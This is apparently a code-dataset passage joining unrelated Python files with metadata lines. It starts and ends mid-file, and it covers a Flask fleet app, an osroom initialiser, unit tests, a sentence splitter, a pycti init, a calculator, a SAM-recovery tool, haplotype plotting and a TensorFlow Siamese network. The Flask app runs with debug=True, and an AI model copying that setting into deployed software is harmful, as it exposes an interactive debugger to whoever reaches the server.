return redirect(url_for('index'))
@app.route('/add_driver/', methods=['POST'])
def add_driver():
if request.method == 'POST':
lis = ["write_drivers",request.form["driver_name"],request.form["License_no"],request.form["contact_no"]]
flash(setConnection(lis))
return redirect(url_for('index'))
@app.route('/add_vehicle/', methods=['POST'])
def add_vehicle():
if request.method == 'POST':
lis = ["write_vehicles",request.form["veh_no"],request.form["chassis_no"],request.form["vehicle_class"],request.form["vehicle_capacity"]]
flash(setConnection(lis))
return redirect(url_for('index'))
@app.route('/add_dependent/<driver_id>', methods=['POST'])
def add_dependent(driver_id):
if request.method == 'POST':
lis = ["write_dependents",driver_id,request.form["nm"],request.form["rel"],request.form["cnt"]]
flash(setConnection(lis))
return redirect(url_for('driver',driver_id=driver_id))
@app.route('/add_salary/<driver_id>', methods=['POST'])
def add_salary(driver_id):
if request.method == 'POST':
lis = ["write_salary",driver_id,request.form["salary"]]
flash(setConnection(lis))
return redirect(url_for('driver',driver_id=driver_id))
@app.route('/pay_loan/<veh_no>/<loan_no>', methods=['POST'])
def pay_loan(veh_no,loan_no):
if request.method == 'POST':
lis = ["write_loanPayRegister",loan_no,request.form["emi"]]
flash(setConnection(lis))
return redirect(url_for('vehicle',veh_no=veh_no))
@app.route('/')
def index():
vehicles=setConnection(["read_vehicles"])
drivers=setConnection(["read_drivers"])
customers=setConnection(["read_customers"])
return render_template('Mainboot.html',vehicles=vehicles,drivers=drivers,customers=customers)
@app.route('/driver/<driver_id>')
def driver(driver_id):
driver=setConnection(["read_driver",driver_id])
dependents=setConnection(["read_dependents",driver_id])
return render_template('Driver.html',driver=driver,dependents=dependents)
@app.route('/vehicle/<veh_no>')
def vehicle(veh_no):
vehicle=setConnection(["read_vehicle",veh_no])
customers=setConnection(["read_customers"])
tripDetail=setConnection(["read_tripDetails",veh_no])
loanProgress=setConnection(["read_loans",veh_no])
loanStatus=setConnection(["read_loanStatus",veh_no])
status=setConnection(["read_trips",veh_no])
status.append(0)
loanProgress.append(0)
return render_template('Vehicle.html',loanStatus=loanStatus,loanProgress=loanProgress,vehicle=vehicle,customers=customers,tripDetail=tripDetail,status=status)
if __name__ == '__main__':
app.run(debug = True)
| 2.34375 | 2 |
apps/init_before_startup.py | osroom/osroom | 579 | 12769737 | <filename>apps/init_before_startup.py
#!/usr/bin/env python
# -*-coding:utf-8-*-
# @Time : 2020/03/14 12:44
# @Author : <NAME>
import sys
from signal import signal, SIGCHLD, SIG_IGN
from pymongo.errors import OperationFailure
from apps.configs.db_config import DB_CONFIG
from apps.core.db.config_mdb import DatabaseConfig
from apps.core.db.mongodb import MyMongo
from apps.develop_run_options import start_info_print
from apps.app import app
from apps.brand_info import start_info
def init_before_startup(is_debug, csrf_enabled):
"""
启动前初始化相关数据
:param is_debug:
:param csrf_enabled:
:return:
"""
start_info()
start_info_print("\033[1;36m osroom staring...\033[0m")
# 网站还未启动的时候, 临时连接数据库, 更新collections & 系统配置
from apps.core.utils.update_sys_data import update_mdb_collections, init_datas, \
compatible_processing
database = DatabaseConfig()
mdbs = {}
# 创建局部临时数据库对象
for k, mdb_acc in DB_CONFIG["mongodb"].items():
mdbs[k] = MyMongo()
# 初始化2次,第一次初始化是为了更新mdb的collections
# 如果第一次更新后存在新的collections,需要再次初始化数据库供其他程序使用
db_init = 2
while db_init:
try:
for name, mdb in mdbs.items():
if db_init == 1:
mdb.close()
if name not in ["sys", "user", "web"]:
msg = "[Error]: 由v1.x.x更新到v2.x.x需要请更新你的数据库配置文件apps/configs/db_config.py." \
"请参考同目录下的db_config_sample.py"
start_info_print('\033[31m{}\033[0m'.format(msg))
sys.exit()
mdb.init_app(
config_prefix=name.upper(),
db_config=database.__dict__["{}_URI".format(name.upper())]
)
except OperationFailure as e:
msg = "\n[Mongodb] *{}\nMongodb validation failure, the user name, " \
"password mistake or database configuration errors.\n" \
"Tip: to open database authentication configuration".format(e)
start_info_print('\033[31m{}\033[0m'.format(msg))
sys.exit(-1)
if db_init == 2 and is_debug:
# 更新数据库文档表
start_info_print(" * Check or update the database collection")
update_mdb_collections(mdbs=mdbs)
else:
# 未更新数据库coll,无需二次初始化数据库,直接break
break
db_init -= 1
if not is_debug:
# 更新配置文件
from apps.core.flask.update_config_file import update_config_file
start_info_print(" * Update and sync config.py")
r = update_config_file(mdbs=mdbs)
if not r:
start_info_print("[Error] Update profile error, check log sys_start.log")
sys.exit(-1)
else:
msgs = " * The following services need to be run in a non-debugger state.\n" \
" Including the following services:- Automatic update of Mongodb collections.\n" \
" - Automatic update of website routing rights control.\n" \
" - Automatically update and merge system configuration.\n\n"
warning_msg = "\033[03m " \
"If the program runs incorrectly because the above configuration \n" \
" is not updated, you need to remove the debugger running program \n" \
" first to implement the update. After that, you can continue to run \n" \
" the program under the debugger."
start_info_print('\033[33m{}{}\033[0m'.format(msgs, warning_msg))
# 调用兼容程序step 1
compatible_processing(mdbs=mdbs, stage=1)
# 调用初始化数据
init_datas(mdbs=mdbs)
for mdb in mdbs.values():
mdb.close()
# 核心程序初始化+模块加载
from apps.core.flask.module_import import module_import
from apps.init_core_module import init_core_module
from apps.configs.sys_config import MODULES
init_core_module(
app,
csrf_enabled=csrf_enabled,
is_debug=is_debug
)
module_import(MODULES)
# 调用兼容程序step 2
from apps.app import mdbs
compatible_processing(mdbs=mdbs, stage=2)
if not is_debug:
start_info_print(
" * Signal:(SIGCHLD, SIG_IGN)."
"Prevent child processes from becoming [Defunct processes]."
"(Do not need to comment out)")
signal(SIGCHLD, SIG_IGN)
start_info_print(" * Started successfully")
else:
start_info_print(" * Debugger: Started successfully")
| 1.984375 | 2 |
tests/test_jdla_basic.py | JosueDLA/BasicModule | 0 | 12769738 | <gh_stars>0
import unittest
from jdla_basic import basic_operations
class Test_basic_opea(unittest.TestCase):
def test_add(self):
self.assertEqual(basic_operations.addition(10, 5), 15)
self.assertEqual(basic_operations.addition(-1, 1), 0)
self.assertEqual(basic_operations.addition(1, -1), 0)
self.assertEqual(basic_operations.addition(-1, -1), -2)
def test_sub(self):
self.assertEqual(basic_operations.substraction(10, 5), 5)
self.assertEqual(basic_operations.substraction(-1, 1), -2)
self.assertEqual(basic_operations.substraction(1, -1), 2)
self.assertEqual(basic_operations.substraction(-1, -1), -0)
def test_multi(self):
self.assertEqual(basic_operations.multiplication(10, 5), 50)
self.assertEqual(basic_operations.multiplication(-1, 1), -1)
self.assertEqual(basic_operations.multiplication(1, -1), -1)
self.assertEqual(basic_operations.multiplication(-1, -1), 1)
def test_divi(self):
self.assertEqual(basic_operations.division(10, 5), 2)
self.assertEqual(basic_operations.division(-1, 1), -1)
self.assertEqual(basic_operations.division(1, -1), -1)
self.assertEqual(basic_operations.division(-1, -1), 1)
# self.assertRaises Value expected, method, args
self.assertRaises(ValueError, basic_operations.division, 10, 0)
# Test Exception using context manager
with self.assertRaises(ValueError):
basic_operations.division(10, 0)
if __name__ == '__main__':
unittest.main()
| 3.09375 | 3 |
jionlp/gadget/split_sentence.py | Hello-Toufu/jionlp | 0 | 12769739 | <gh_stars>0
# -*- coding=utf-8 -*-
import os
import re
import pdb
class SplitSentence(object):
def __init__(self):
self.puncs_fine = None
def _prepare(self):
self.puncs_fine = ['……', '\r\n', ',', '。', ';', ';', '…', '!',
'!', '?', '?', '\r', '\n', '“', '”', '‘', '’',
':']
self.puncs_coarse = ['。', '!', '?', '\n', '“', '”', '‘', '’']
self.front_quote_list = ['“', '‘']
self.puncs_coarse_ptn = re.compile('([。“”!?\n])')
self.puncs_fine_ptn = re.compile('([,:。;“”;…!!??\r\n])')
def __call__(self, text, criterion='coarse'):
'''将文本切分为若干句子
Args:
text(str): 字符串文本
criterion(coarse/fine): 句子切分粒度,粗细两种 `coarse` 或 `fine`,
`coarse` 指的是按句号级别切分,`fine` 指按所有标点符合切分,
默认按照粗粒度进行切分
pattern(str): 用户可指定正则模式进行切分,该字符串必须正则编译正确
Returns:
list(str): 句子列表
Examples:
>>> text = '中华古汉语,泱泱大国,历史传承的瑰宝。'
>>> print(bbd.split_sentences(text, criterion='fine'))
['中华古汉语,', '泱泱大国,', '历史传承的瑰宝。']
'''
if self.puncs_fine is None:
self._prepare()
if criterion == 'coarse':
tmp_list = self.puncs_coarse_ptn.split(text)
elif criterion == 'fine':
tmp_list = self.puncs_fine_ptn.split(text)
else:
raise ValueError('The parameter `criterion` must be '
'`coarse` or `fine`.')
final_sentences = list()
cur_flag = 0
quote_flag = False
for idx, sen in enumerate(tmp_list):
if sen == '':
continue
if criterion == 'coarse':
if sen in self.puncs_coarse:
# 前引号较为特殊,其后的一句需要与前引号合并,而不与其前一句合并
if sen in self.front_quote_list:
quote_flag = True
final_sentences.append(sen)
continue
if len(final_sentences) == 0:
final_sentences.append(sen)
else:
final_sentences[-1] = ''.join(
[final_sentences[-1], sen])
continue
elif criterion == 'fine':
if sen in self.puncs_fine:
# 前引号较为特殊,其后的一句需要与前引号合并,而不与其前一句合并
if sen in self.front_quote_list:
quote_flag = True
final_sentences.append(sen)
continue
if len(final_sentences) == 0:
final_sentences.append(sen)
else:
final_sentences[-1] = ''.join(
[final_sentences[-1], sen])
continue
if quote_flag:
final_sentences[-1] = ''.join([final_sentences[-1], sen])
quote_flag = False
else:
final_sentences.append(sen)
return final_sentences
if __name__ == '__main__':
split_sentence = SplitSentence()
text = '中华古汉语,泱泱大国,历史传承的瑰宝。。'
res = split_sentence(text, criterion='fine')
print(res)
| 3.046875 | 3 |
pycti/__init__.py | Cix-16/client-python | 0 | 12769740 | <reponame>Cix-16/client-python
# -*- coding: utf-8 -*-
from .api.opencti_api_client import OpenCTIApiClient
from .api.opencti_api_connector import OpenCTIApiConnector
from .api.opencti_api_job import OpenCTIApiJob
from .connector.opencti_connector import ConnectorType
from .connector.opencti_connector import OpenCTIConnector
from .connector.opencti_connector_helper import (
OpenCTIConnectorHelper,
get_config_variable,
)
from .entities.opencti_tag import Tag
from .entities.opencti_marking_definition import MarkingDefinition
from .entities.opencti_external_reference import ExternalReference
from .entities.opencti_kill_chain_phase import KillChainPhase
from .entities.opencti_stix_entity import StixEntity
from .entities.opencti_stix_domain_entity import StixDomainEntity
from .entities.opencti_stix_observable import StixObservable
from .entities.opencti_stix_relation import StixRelation
from .entities.opencti_stix_sighting import StixSighting
from .entities.opencti_stix_observable_relation import StixObservableRelation
from .entities.opencti_identity import Identity
from .entities.opencti_threat_actor import ThreatActor
from .entities.opencti_intrusion_set import IntrusionSet
from .entities.opencti_campaign import Campaign
from .entities.opencti_incident import Incident
from .entities.opencti_malware import Malware
from .entities.opencti_tool import Tool
from .entities.opencti_vulnerability import Vulnerability
from .entities.opencti_attack_pattern import AttackPattern
from .entities.opencti_course_of_action import CourseOfAction
from .entities.opencti_report import Report
from .entities.opencti_note import Note
from .entities.opencti_opinion import Opinion
from .entities.opencti_indicator import Indicator
from .utils.opencti_stix2 import OpenCTIStix2
from .utils.constants import ObservableTypes
from .utils.constants import CustomProperties
__all__ = [
"OpenCTIApiClient",
"OpenCTIApiConnector",
"OpenCTIApiJob",
"ConnectorType",
"OpenCTIConnector",
"OpenCTIConnectorHelper",
"get_config_variable",
"Tag",
"MarkingDefinition",
"ExternalReference",
"KillChainPhase",
"StixEntity",
"StixDomainEntity",
"StixObservable",
"StixRelation",
"StixSighting",
"StixObservableRelation",
"Identity",
"ThreatActor",
"IntrusionSet",
"Campaign",
"Incident",
"Malware",
"Tool",
"Vulnerability",
"AttackPattern",
"CourseOfAction",
"Report",
"Note",
"Opinion",
"Indicator",
"OpenCTIStix2",
"ObservableTypes",
"CustomProperties",
]
| 1.109375 | 1 |
src/calculator/calculator.py | Rafiatu/calculator | 0 | 12769741 | <reponame>Rafiatu/calculator<filename>src/calculator/calculator.py
class CalculatorException(Exception):
pass
class Calculator:
"""
This is a simple Calculator that performs basic addition, subtraction,
division, multiplication and root calculation of numbers.
"""
def __init__(self):
self.__val = 0
def add(self, num:int or float or complex):
"""add a number to the current value in the calculator"""
try:
self.__val += num
return self.__val
except Exception:
raise CalculatorException("Something went wrong. function add() takes only integers")
def subtract(self, num:int or float or complex):
"""subtract a number from the current value in the calculator"""
try:
self.__val -= num
return self.__val
except Exception:
raise CalculatorException("Something went wrong. Ensure to use the right input types")
def multiply(self, num:int or float or complex):
"""multiply a number with the current value in the calculator"""
self.__val *= num
return self.__val
def divide(self, num:int or float or complex):
"""divides the current value in the calculator by the given number"""
try:
self.__val /= num
return self.__val
except ZeroDivisionError:
raise CalculatorException("Something went wrong. "
"You are most likely attempting a division with 0")
def root(self, num:int):
"""gets the n root of the current value in the calculator"""
try:
self.__val **= (1/num)
return self.__val
except Exception:
raise CalculatorException("Something went wrong. "
"You are most likely attempting a division with 0")
def reset_memory(self):
"""clears all calculator history and resets the value to zero."""
self.__val = 0
return self.__val
| 4.21875 | 4 |
sprint/tools_sam/recover_sam.py | jumphone/sprint | 44 | 12769742 | <gh_stars>10-100
#poly_limit=10
def poly_check(seq,poly_limit):
if 'A'*poly_limit not in seq and 'T'*poly_limit not in seq and 'G'*poly_limit not in seq and 'C'*poly_limit not in seq:
return True
else:
return False
def var_check(change_from, change_to, seq,var_limit):
ALL=['A','T','C','G']
tmp=[]
for one in ALL:
if one !=change_from.upper() and one !=change_to.upper():
tmp.append(one)
flag=1
for one in tmp:
if seq.count(one) < var_limit/(float(len(tmp))+2):
flag=0
if flag==1:
return True
else:
return False
def reverse_base(base):
base=base.upper()
if base=='A':
return 'T'
elif base=='C':
return 'G'
elif base=='G':
return 'C'
elif base=='T':
return 'A'
else:
return 'N'
def recover_sam(sam_in_dir,sam_out_dir, var_limit=20,poly_limit=10,rm_multi=0):
fi=open(sam_in_dir)
fo=open(sam_out_dir,'w')
for line in fi:
seq=line.split('\t')
if line[0]=='@':
fo.write(line)
elif seq[1]=='4' and seq[2]=='*':
break
elif seq[1]!='4' and len(seq)>=9:
seq=line.split('\t')
seq[9]=seq[9].upper()
seq[1]=int(seq[1])
if len(bin(seq[1]))>=7:
if bin(seq[1])[-3]!='1':
if bin(seq[1])[-5]=='1':
seq[1]='16'
else:
seq[1]='0'
seq[1]=str(seq[1])
record=bin(int(seq[0].split('_|_')[2]))[3:]
change_from=seq[0].split('_|_')[1].split('_')[0]
change_to=seq[0].split('_|_')[1].split('_')[2]
if len(bin(int(seq[1]))) > 5 and bin(int(seq[1]))[-5]=='1': #seq[1]=='16':
change_from=reverse_base(change_from)
change_to=reverse_base(change_to)
record=record[::-1]
else:
record=record
changed_read=seq[9]
i=0
recovered_read=''
while i<len(seq[9]):
if record[i]=='1' and seq[9][i]==change_to:
recovered_read += change_from
elif record[i]=='1' and seq[9][i]!=change_to:
#print "recover error in "+seq[0]
recovered_read += 'N'
else:
recovered_read += seq[9][i]
i=i+1
seq[9]=recovered_read
#fo.write(seq[0])
#if len(record)==len(seq[9]) and 'I' not in seq[5] and 'D' not in seq[5] and len(record)-changed_read.count(change_to) > 25 and poly_check(seq[9],poly_limit):
if len(record)==len(seq[9]) and len(record)-changed_read.count(change_to) > var_limit and poly_check(seq[9],poly_limit): #and var_check(change_from,change_to,seq[9],var_limit):
if (rm_multi==1 and "XA:Z:" not in line) or rm_multi==0:
fo.write(seq[0])
j=1
while j<len(seq):
fo.write('\t'+seq[j])
j=j+1
# 1+1
fo.close()
fi.close()
| 2.65625 | 3 |
hivwholeseq/patients/get_region_haplotypes.py | neherlab/hivwholeseq | 3 | 12769743 | # vim: fdm=marker
'''
author: <NAME>
date: 11/11/14
content: Get local haplotypes from single read pairs, including insertions
and deletions. This includes aggressive clustering to keep the
multiple sequence alignments efficient.
'''
# Modules
import os
import argparse
from operator import itemgetter
from itertools import izip
import numpy as np
from matplotlib import cm
import matplotlib.pyplot as plt
from hivwholeseq.patients.patients import load_patient
from hivwholeseq.utils.argparse import RoiAction
from hivwholeseq.utils.sequence import build_msa_haplotypes as build_msa
# Functions
def plot_haplotype_frequencies(times, hft, figax=None, title='',
picker=None):
'''Plot haplotype frequencies'''
import hivwholeseq.utils.plot
from matplotlib import cm
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style('darkgrid')
fs = 16
if figax is None:
fig, ax = plt.subplots(figsize=(12, 7))
else:
fig, ax = figax
# TODO: The hard part is finding an ordering
hft_cum = hft.cumsum(axis=1)
# Randomize colors to make them more visible
colors = cm.jet(1.0 * np.arange(hft.shape[1]) / hft.shape[1])
np.random.shuffle(colors)
# Use fake zero/one for logit plots
freqmin = 1e-6
# Plot first line
ax.fill_between(times, hft_cum[:, 0], freqmin + np.zeros(hft.shape[0]), color=colors[0],
label=str(0),
picker=picker)
for i in xrange(1, hft.shape[1]):
ax.fill_between(times, hft_cum[:, i],
np.minimum(1-freqmin, hft_cum[:, i - 1]), color=colors[i],
label=str(i),
picker=picker)
ax.set_xlabel('Time from infection [days]', fontsize=fs)
ax.set_ylabel('Haplotype frequency', fontsize=fs)
ax.set_ylim(1e-4, 1 - 1e-4)
ax.set_xlim(times[0], times[-1])
ax.xaxis.set_tick_params(labelsize=fs)
ax.yaxis.set_tick_params(labelsize=fs)
if title:
ax.set_title(title, fontsize=fs)
return (fig, ax)
# Script
if __name__ == '__main__':
# Parse input args
parser = argparse.ArgumentParser(description='Get local haplotypes',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--patient', required=True,
help='Patient to analyze')
parser.add_argument('--region', required=True,
help='Genomic region (e.g. V3 p17)')
parser.add_argument('--verbose', type=int, default=0,
help='Verbosity level [0-4]')
parser.add_argument('--plot', action='store_true',
help='Plot local haplotype trajectories')
args = parser.parse_args()
pname = args.patient
region = args.region
VERBOSE = args.verbose
use_plot = args.plot
patient = load_patient(pname)
patient.discard_nonsequenced_samples()
if VERBOSE >= 1:
print patient.name, region
hct, ind, seqs = patient.get_haplotype_count_trajectory(region,
aligned=True)
hft = (1.0 * hct.T / hct.sum(axis=1)).T
if use_plot:
times = patient.times[ind]
plot_haplotype_frequencies(times, hft, title=patient.code+', '+region)
plt.tight_layout()
plt.ion()
plt.show()
| 2.390625 | 2 |
test/test_contact_details_db.py | tankisleva/python_training | 0 | 12769744 | <reponame>tankisleva/python_training<filename>test/test_contact_details_db.py
from model.contact import Contact
def test_deatails_on_contact_tabe(app, db):
contact_from_table_list = app.contact.get_contact_list_all_data_from_table()
contact_list_db = db.get_contact_list_all_data()
assert sorted(contact_from_table_list, key=Contact.id_or_max) == sorted(contact_list_db, key=Contact.id_or_max)
| 2.5625 | 3 |
tf/siamese_network.py | zxlzr/atec_back | 0 | 12769745 | <gh_stars>0
#!/usr/bin/env python
# coding=utf-8
import tensorflow as tf
class SiameseNets(object):
"""
A Siamese CNN/RNN based network for text similarity.
Uses a character/word level embedding layer, followed by a {`BiLSTM`, `CNN`, `combine`} network
and Energy Loss layer.
"""
def __init__(self,
model_type,
sequence_length,
embedding_size,
word_embedding_type,
vocab_size,
filter_sizes,
num_filters,
rnn_cell,
hidden_units,
num_layers,
l2_reg_lambda,
pred_threshold,
energy_func,
loss_func='contrasive',
margin=0.0,
contrasive_loss_pos_weight=1.0,
dense_layer=False,
use_attention=False,
weight_sharing=True):
self.seqlen1 = tf.placeholder(tf.int32, [None])
self.seqlen2 = tf.placeholder(tf.int32, [None])
self.input_x1 = tf.placeholder(tf.int32, [None, sequence_length], name="input_x1")
self.input_x2 = tf.placeholder(tf.int32, [None, sequence_length], name="input_x2")
self.input_y = tf.placeholder(tf.float32, [None], name="input_y")
self.dropout_keep_prob = tf.placeholder(tf.float32, name="dropout_keep_prob")
#self.dropout_emb = tf.placeholder(tf.float32, name="dropout_emb")
# input word level dropout, data augmentation, invariance to small input change
# self.shape = tf.shape(self.input_x1)
# self.mask1 = tf.cast(tf.random_uniform(self.shape) > 0.1, tf.int32)
# self.mask2 = tf.cast(tf.random_uniform(self.shape) > 0.1, tf.int32)
# self.input_x1 = self.input_x1 * self.mask1
# self.input_x2 = self.input_x2 * self.mask2
with tf.variable_scope("embedding"):
if word_embedding_type == "rand":
self.W = tf.Variable(
tf.random_uniform([vocab_size, embedding_size], -1.0, 1.0),
trainable=True, name="W") # tf.truncated_normal()
# self.W = tf.get_variable(name='W', shape=[vocab_size, embedding_size],
# initializer=tf.random_uniform_initializer(-1, 1))
else:
trainable = False if word_embedding_type == "static" else True
self.W = tf.Variable(
tf.constant(0.0, shape=[vocab_size, embedding_size]),
trainable=trainable, name="W")
# embedding_placeholder = tf.placeholder(tf.float32, [vocab_size, embedding_size])
# self.embedding_init = self.W.assign(embedding_placeholder)
self.embedded_1 = tf.nn.embedding_lookup(self.W, self.input_x1)
self.embedded_2 = tf.nn.embedding_lookup(self.W, self.input_x2)
# Input embedding dropout. very sensitive to the dropout rate !
self.embedded_1 = tf.nn.dropout(self.embedded_1, 0.7)
self.embedded_2 = tf.nn.dropout(self.embedded_2, 0.7)
self.embedded_1_expanded = tf.expand_dims(self.embedded_1, -1) # shape(batch_size, seq_len, dim, 1)
self.embedded_2_expanded = tf.expand_dims(self.embedded_2, -1)
if weight_sharing:
cnn_scope1, cnn_scope2, rnn_scope1, rnn_scope2 = "CNN", "CNN", "RNN", "RNN"
else:
cnn_scope1, cnn_scope2, rnn_scope1, rnn_scope2 = "CNN1", "CNN2", "RNN1", "RNN2"
# shape(batch_size, num_filters*len(filters_sizes)) # very sparse !
self.cnn_out1 = self.cnn(self.embedded_1_expanded,
sequence_length, embedding_size, filter_sizes, num_filters, scope=cnn_scope1)
self.cnn_out2 = self.cnn(self.embedded_2_expanded,
sequence_length, embedding_size, filter_sizes, num_filters, scope=cnn_scope2)
# shape(batch_size, 2*hidden_units)
self.rnn_out1 = self.bi_rnn(self.embedded_1, rnn_cell, hidden_units, num_layers,
self.seqlen1, False, use_attention, rnn_scope1)
self.rnn_out2 = self.bi_rnn(self.embedded_2, rnn_cell, hidden_units, num_layers,
self.seqlen2, False, use_attention, rnn_scope2)
if model_type.lower() == 'cnn':
self.out1 = self.cnn_out1
self.out2 = self.cnn_out2
elif model_type.lower() == 'rnn':
self.out1 = self.rnn_out1
self.out2 = self.rnn_out2
elif model_type.lower() == 'rcnn':
self.out1 = tf.concat([self.cnn_out1, self.rnn_out1], axis=1)
self.out2 = tf.concat([self.cnn_out2, self.rnn_out2], axis=1)
if dense_layer:
with tf.variable_scope("fc"):
out_dim = self.out1.get_shape().as_list()[1]
W1 = tf.get_variable("W1", shape=[out_dim, 128], initializer=tf.contrib.layers.xavier_initializer())
b1 = tf.Variable(tf.constant(0.1, shape=[128]), name="b1")
W2 = tf.get_variable("W2", shape=[out_dim, 128], initializer=tf.contrib.layers.xavier_initializer())
b2 = tf.Variable(tf.constant(0.1, shape=[128]), name="b2")
self.out1 = tf.nn.xw_plus_b(self.out1, W1, b1, name="out1")
self.out2 = tf.nn.xw_plus_b(self.out2, W2, b2, name="out2")
self.mul = tf.multiply(self.out1, self.out2)
#self.concat = tf.concat([self.out1, self.out2], axis=1)
out1_norm = tf.sqrt(tf.reduce_sum(tf.square(self.out1), 1))
# tf.norm(tensor, ord='euclidean', axis=None, keep_dims=False, name=None)
out2_norm = tf.sqrt(tf.reduce_sum(tf.square(self.out2), 1))
self.distance = tf.sqrt(tf.reduce_sum(tf.square(self.out1-self.out2), 1, keep_dims=False))
# normalize euclidean distance, think as triangle, so dis range [0,1]
self.distance = tf.div(self.distance, tf.add(out1_norm, out2_norm))
self.sim_euc = tf.subtract(1.0, self.distance, name="euc")
# self.sim = tf.reduce_sum(tf.multiply(self.out1, self.out2), 1) / tf.multiply(out1_norm, out2_norm)
# # shape(batch_size,), if keep_dims=True shape(batch_size, 1)
out1_norm = tf.nn.l2_normalize(self.out1, 1) # output = x / sqrt(max(sum(x**2), epsilon))
out2_norm = tf.nn.l2_normalize(self.out2, 1)
self.sim_cos = tf.reduce_sum(tf.multiply(out1_norm, out2_norm), axis=1, name="cosine")
# sim = exp(-||x1-x2||) range (0, 1]
self.sim_ma = tf.exp(-tf.reduce_sum(tf.abs(self.out1-self.out2), 1), name="manhattan")
tf.concat([self.out1, self.out2, self.out1-self.out2, ], axis=1)
if energy_func == 'euclidean':
self.e = self.sim_euc
elif energy_func == 'cosine':
self.e = self.sim_cos
elif energy_func == 'exp_manhattan':
self.e = self.sim_ma
elif energy_func == 'combine':
w = tf.Variable(0, dtype=tf.float32)
#self.e = w*self.sim_euc + (1-w)*self.sim_cos
self.e = w*self.sim_euc + (1-w)*self.sim_cos
# self.fc1 = tf.layers.dense(tf.concat(
# [tf.expand_dims(self.sim_euc, 1), tf.expand_dims(self.sim_cos, 1)], 1), 128, activation=tf.nn.relu, name='fc1')
# self.e = tf.layers.dense(self.fc1, 1, activation=tf.nn.relu, name='score')
#self.e = tf.layers.dense(tf.concat([tf.expand_dims(self.sim_euc, 1),
#tf.expand_dims(self.sim_cos, 1) ], 1), 1, activation=tf.nn.relu, name='score')
with tf.name_scope("loss"):
if loss_func == 'contrasive':
self.loss = self.contrastive_loss(self.input_y, self.e, margin, pos_weight=contrasive_loss_pos_weight)
elif loss_func == 'cross_entrophy':
self.loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y, logits=self.e))
# add l2 reg except bias anb BN variables.
self.l2 = l2_reg_lambda * tf.reduce_sum(
[tf.nn.l2_loss(v) for v in tf.trainable_variables() if not ("noreg" in v.name or "bias" in v.name)])
self.loss += self.l2
if use_attention:
self.loss += tf.reduce_mean(self.P)
# Accuracy computation is outside of this class.
with tf.name_scope("metrics"):
# tf.rint: Returns element-wise integer closest to x. auto threshold 0.5
self.y_pred = tf.cast(tf.greater(self.e, pred_threshold), dtype=tf.float32, name="y_pred")
# self.accuracy = tf.reduce_mean(tf.cast(tf.equal(self.y_pred, self.input_y), tf.float32), name="accuracy")
TP = tf.count_nonzero(self.input_y * self.y_pred, dtype=tf.float32)
TN = tf.count_nonzero((self.input_y - 1) * (self.y_pred - 1), dtype=tf.float32)
FP = tf.count_nonzero(self.y_pred * (self.input_y - 1), dtype=tf.float32)
FN = tf.count_nonzero((self.y_pred - 1) * self.input_y, dtype=tf.float32)
# tf.div like python2 division, tf.divide like python3
self.cm = tf.confusion_matrix(self.input_y, self.y_pred, name="confusion_matrix") # [[5036 1109] [842 882]]
self.acc = tf.divide(TP + TN, TP + TN + FP + FN, name="accuracy")
self.precision = tf.divide(TP, TP + FP, name="precision")
self.recall = tf.divide(TP, TP + FN, name="recall")
self.f1 = tf.divide(2 * self.precision * self.recall, self.precision + self.recall, name="F1_score")
def bi_rnn(self, x, rnn_cell, hidden_units, num_layers, sequence_length, dynamic, use_attention, scope):
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
# scope.reuse_variables() # or tf.get_variable_scope().reuse_variables()
# current_batch_of_words does not correspond to a "sentence" of words
# but [t_steps, batch_size, num_features]
# Unpacks the given dimension of a rank-`R` tensor into rank-`(R-1)` tensors.
# sequence_length list tensors of shape (batch_size, embedding_dim)
if not dynamic:
x = tf.unstack(tf.transpose(x, perm=[1, 0, 2])) # `static_rnn` input
if rnn_cell.lower() == 'lstm':
rnn_cell = tf.nn.rnn_cell.LSTMCell
elif rnn_cell.lower() == 'gru':
rnn_cell = tf.nn.rnn_cell.GRUCell
with tf.variable_scope("fw"):
# state(c, h), tf.nn.rnn_cell.BasicLSTMCell does not support gradient clipping, use tf.nn.rnn_cell.LSTMCell.
fw_cells = [rnn_cell(hidden_units) for _ in range(num_layers)]
fw_cells = tf.nn.rnn_cell.MultiRNNCell(cells=fw_cells, state_is_tuple=True)
fw_cells = tf.nn.rnn_cell.DropoutWrapper(fw_cells, input_keep_prob=1, output_keep_prob=self.dropout_keep_prob,
state_keep_prob=1.0, variational_recurrent=False, dtype=tf.float32)
with tf.variable_scope("bw"):
bw_cells = [rnn_cell(hidden_units) for _ in range(num_layers)]
bw_cells = tf.nn.rnn_cell.MultiRNNCell(cells=bw_cells, state_is_tuple=True)
bw_cells = tf.nn.rnn_cell.DropoutWrapper(bw_cells, input_keep_prob=1, output_keep_prob=self.dropout_keep_prob,
variational_recurrent=False, dtype=tf.float32)
if dynamic:
# [batch_size, max_time, cell_fw.output_size]
outputs, output_states = tf.nn.bidirectional_dynamic_rnn(
fw_cells, bw_cells, x, sequence_length=sequence_length, dtype=tf.float32)
# outputs = tf.concat(outputs, 2)
# outputs = outputs[:, -1, :] # take last hidden states (batch_size, 2*hidden_units)
output_fw = output_states[0][0].h
output_bw = output_states[0][1].h
outputs = tf.concat([output_fw, output_bw], 1)
else:
# `static_rnn` Returns: A tuple (outputs, output_state_fw, output_state_bw)
# outputs is a list of outputs (one for each input), depth-concatenated forward and backward outputs.
outputs, _, _ = tf.nn.static_bidirectional_rnn(fw_cells, bw_cells, x, dtype=tf.float32)
# outputs = tf.reduce_mean(outputs, 0) # average [batch_size, hidden_units] (mean pooling)
# outputs = tf.reduce_max(outputs, axis=0) # max pooling, bad result.
if use_attention:
d_a = 300
r = 2
self.H = tf.transpose(tf.stack(outputs), perm=[1, 0, 2]) # (bs, seq_len, 2*hidden_units)
batch_size = tf.shape(self.input_x1)[0]
initializer = tf.contrib.layers.xavier_initializer()
with tf.variable_scope("attention"):
# shape(W_s1) = d_a * 2u
self.W_s1 = tf.get_variable('W_s1', shape=[d_a, 2 * hidden_units], initializer=initializer)
# shape(W_s2) = r * d_a
self.W_s2 = tf.get_variable('W_s2', shape=[r, d_a], initializer=initializer)
# shape (d_a, 2u) --> shape(batch_size, d_a, 2u)
self.W_s1 = tf.tile(tf.expand_dims(self.W_s1, 0), [batch_size, 1, 1])
self.W_s2 = tf.tile(tf.expand_dims(self.W_s2, 0), [batch_size, 1, 1])
# attention matrix A = softmax(W_s2*tanh(W_s1*H^T) shape(A) = batch_siz * r * n
